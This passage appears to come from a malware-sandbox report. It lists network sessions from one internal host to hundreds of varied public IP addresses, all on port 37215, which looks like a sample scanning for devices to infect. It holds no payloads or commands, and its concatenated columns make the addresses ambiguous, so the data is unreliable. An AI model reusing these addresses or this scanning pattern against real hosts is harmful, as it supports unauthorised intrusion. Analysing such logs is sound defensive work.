                                              14681192.168.2.1537338222.105.5.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14682192.168.2.1533268157.2.225.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14683192.168.2.153831245.223.2.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14684192.168.2.1558918122.94.101.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14685192.168.2.155302241.245.80.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14686192.168.2.153358437.21.211.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14687192.168.2.1552060138.253.60.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14688192.168.2.1553804121.116.211.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14689192.168.2.153651441.193.222.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14690192.168.2.155715094.187.139.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14691192.168.2.154041645.159.172.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14692192.168.2.1535522181.74.29.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14693192.168.2.1538174181.132.19.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14694192.168.2.1557770122.84.57.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14695192.168.2.1541538156.117.15.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14696192.168.2.1538260186.202.169.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14697192.168.2.155761445.76.35.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14698192.168.2.1550002181.170.137.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14699192.168.2.1547292102.39.36.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14700192.168.2.1535020122.186.217.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14701192.168.2.154127841.90.246.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14702192.168.2.154451894.241.237.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14703192.168.2.1537704197.80.24.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14704192.168.2.1538462121.237.93.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14705192.168.2.1534124122.63.155.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14706192.168.2.1556708197.145.182.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14707192.168.2.1537702102.130.12.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14708192.168.2.1544520197.44.188.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14709192.168.2.1545546102.73.168.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14710192.168.2.1541164156.89.33.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14711192.168.2.1560052156.228.96.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14712192.168.2.153309294.136.175.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14713192.168.2.155722231.140.42.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14714192.168.2.156064245.212.99.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14715192.168.2.1539128190.202.55.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14716192.168.2.1547764186.84.146.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14717192.168.2.1537334102.123.96.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14718192.168.2.1533286156.89.209.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14719192.168.2.1555926222.145.163.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14720192.168.2.154124494.240.33.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14721192.168.2.155824837.238.229.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14722192.168.2.153828641.121.150.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14723192.168.2.1553148121.128.203.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14724192.168.2.155075094.244.78.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14725192.168.2.1533670121.27.185.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14726192.168.2.1536310181.215.209.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14727192.168.2.1552450197.55.54.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14728192.168.2.154586445.167.112.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14729192.168.2.1554088156.163.117.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14730192.168.2.1548844189.228.64.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14731192.168.2.1538332190.246.194.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14732192.168.2.155709694.4.198.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14733192.168.2.1538188222.99.245.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14734192.168.2.1538732181.63.244.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14735192.168.2.155647445.148.197.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14736192.168.2.1557028190.122.175.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14737192.168.2.1554338122.171.67.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14738192.168.2.1548064102.205.63.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14739192.168.2.1545952138.199.61.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14740192.168.2.155075631.46.155.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14741192.168.2.156002645.10.200.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14742192.168.2.155046631.174.76.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14743192.168.2.1540104121.212.230.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14744192.168.2.1549440157.110.50.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14745192.168.2.1549110138.10.158.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14746192.168.2.1543092156.37.185.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14747192.168.2.1537192121.20.239.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14748192.168.2.155900041.46.84.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14749192.168.2.155418841.49.130.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14750192.168.2.155370437.177.126.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14751192.168.2.153290441.114.150.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14752192.168.2.1533002190.141.85.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14753192.168.2.1557200156.21.142.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14754192.168.2.1535124122.73.22.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14755192.168.2.1552746138.240.242.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14756192.168.2.1557138186.15.209.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14757192.168.2.1558538122.188.242.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14758192.168.2.1535180186.27.226.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14759192.168.2.155799687.34.229.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14760192.168.2.1551626181.108.71.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14761192.168.2.1558668197.210.214.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14762192.168.2.154569831.27.63.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14763192.168.2.1557638157.112.113.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14764192.168.2.1540904102.86.32.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14765192.168.2.1544930196.138.240.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14766192.168.2.1550060138.135.115.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14767192.168.2.1533256122.31.208.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14768192.168.2.1537642186.12.222.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14769192.168.2.1547406122.225.162.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14770192.168.2.1535486121.148.35.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14771192.168.2.153436231.79.209.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14772192.168.2.155190641.210.236.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14773192.168.2.1548324156.116.60.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14774192.168.2.153507037.41.1.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14775192.168.2.153710037.189.127.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14776192.168.2.154077841.15.184.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14777192.168.2.1560954222.194.160.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14778192.168.2.1535606181.125.26.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14779192.168.2.1538944181.56.32.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14780192.168.2.1543104102.46.170.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14781192.168.2.155088037.165.212.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14782192.168.2.1542836197.48.34.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14783192.168.2.1557646102.84.178.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14784192.168.2.1560986186.188.41.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14785192.168.2.1542890156.8.66.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14786192.168.2.1553874138.153.204.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14787192.168.2.154958694.111.62.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14788192.168.2.154688045.84.45.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14789192.168.2.1542718197.200.58.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14790192.168.2.1544852102.246.58.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14791192.168.2.154533637.197.206.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14792192.168.2.1555556181.253.48.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14793192.168.2.1539702197.43.228.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14794192.168.2.1556752222.186.77.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14795192.168.2.153507831.51.140.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14796192.168.2.1558038197.166.0.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14797192.168.2.1542378122.30.162.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14798192.168.2.1556596122.177.26.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14799192.168.2.154494431.86.24.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14800192.168.2.1559348138.241.93.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14801192.168.2.1544846126.54.39.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14802192.168.2.1549020190.206.23.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14803192.168.2.1556498157.102.90.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14804192.168.2.1557882186.190.236.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14805192.168.2.154399037.126.66.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14806192.168.2.154250031.22.190.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14807192.168.2.1536396156.245.233.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14808192.168.2.1549046121.241.22.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14809192.168.2.1533082120.173.247.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14810192.168.2.153775045.237.111.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14811192.168.2.1537872186.192.12.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14812192.168.2.1552594102.64.11.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14813192.168.2.1554602122.82.252.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14814192.168.2.1549914197.138.0.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14815192.168.2.1535726157.241.9.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14816192.168.2.1552702156.109.137.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14817192.168.2.1560088156.140.240.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14818192.168.2.1549864181.101.239.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14819192.168.2.153498837.232.224.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14820192.168.2.153728431.140.249.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14821192.168.2.154982845.123.51.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14822192.168.2.1541016157.183.40.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14823192.168.2.154750637.218.116.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14824192.168.2.1551630157.47.18.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14825192.168.2.1543682138.170.183.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14826192.168.2.1549794102.218.150.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14827192.168.2.1558604186.154.182.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14828192.168.2.1557764121.252.173.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14829192.168.2.1556654181.46.72.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14830192.168.2.155490631.242.144.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14831192.168.2.153690241.63.88.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14832192.168.2.1540024157.45.202.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14833192.168.2.155542241.228.6.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14834192.168.2.1547854222.128.108.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14835192.168.2.1558964102.250.231.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14836192.168.2.155610237.79.192.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14837192.168.2.1541670197.110.250.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14838192.168.2.1533496102.132.184.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14839192.168.2.155777431.158.149.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14840192.168.2.153822294.27.121.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14841192.168.2.1559902222.61.66.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14842192.168.2.1542102122.68.5.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14843192.168.2.1535708186.201.140.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14844192.168.2.153764241.172.117.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14845192.168.2.155055037.70.48.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14846192.168.2.1542346122.101.171.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14847192.168.2.1552918181.32.53.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14848192.168.2.1558096186.83.66.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14849192.168.2.154496894.238.209.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14850192.168.2.154707837.106.102.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14851192.168.2.1553510190.33.49.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14852192.168.2.1552660157.10.141.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14853192.168.2.155056241.74.230.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14854192.168.2.1547602222.21.177.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14855192.168.2.1538534156.143.149.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14856192.168.2.153553437.62.187.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14857192.168.2.1537286121.217.112.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14858192.168.2.1556074181.209.128.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14859192.168.2.1543330102.0.36.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14860192.168.2.154966437.168.25.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14861192.168.2.1540546156.86.192.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14862192.168.2.1560854156.222.202.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14863192.168.2.1547484122.214.173.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14864192.168.2.1551518176.155.29.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14865192.168.2.1543952102.44.130.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14866192.168.2.153603841.200.148.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14867192.168.2.153818694.191.232.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14868192.168.2.155175045.53.33.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14869192.168.2.1535174183.145.69.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14870192.168.2.1539708197.31.89.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14871192.168.2.1557342186.182.242.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14872192.168.2.155503231.168.224.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14873192.168.2.1539188222.244.112.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14874192.168.2.153771094.248.23.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14875192.168.2.1549056119.125.252.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14876192.168.2.1543354190.119.219.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14877192.168.2.1535140102.69.25.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14878192.168.2.1554904222.233.101.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14879192.168.2.154078094.254.53.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14880192.168.2.1553242121.249.203.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14881192.168.2.1546046157.70.206.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14882192.168.2.154742631.162.219.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14883192.168.2.154956041.51.232.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14884192.168.2.153693441.170.36.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14885192.168.2.1550820102.136.8.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14886192.168.2.1549632222.163.181.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14887192.168.2.1535706138.47.58.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14888192.168.2.155845838.51.200.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14889192.168.2.154147041.116.7.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14890192.168.2.154328441.119.228.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14891192.168.2.1540992156.219.61.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14892192.168.2.1547538121.87.4.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14893192.168.2.1552294156.47.146.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14894192.168.2.1535184157.230.110.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14895192.168.2.154540294.8.108.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14896192.168.2.1536446157.145.109.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14897192.168.2.154274694.181.145.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14898192.168.2.1557346121.41.44.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14899192.168.2.1544370102.49.210.3737215
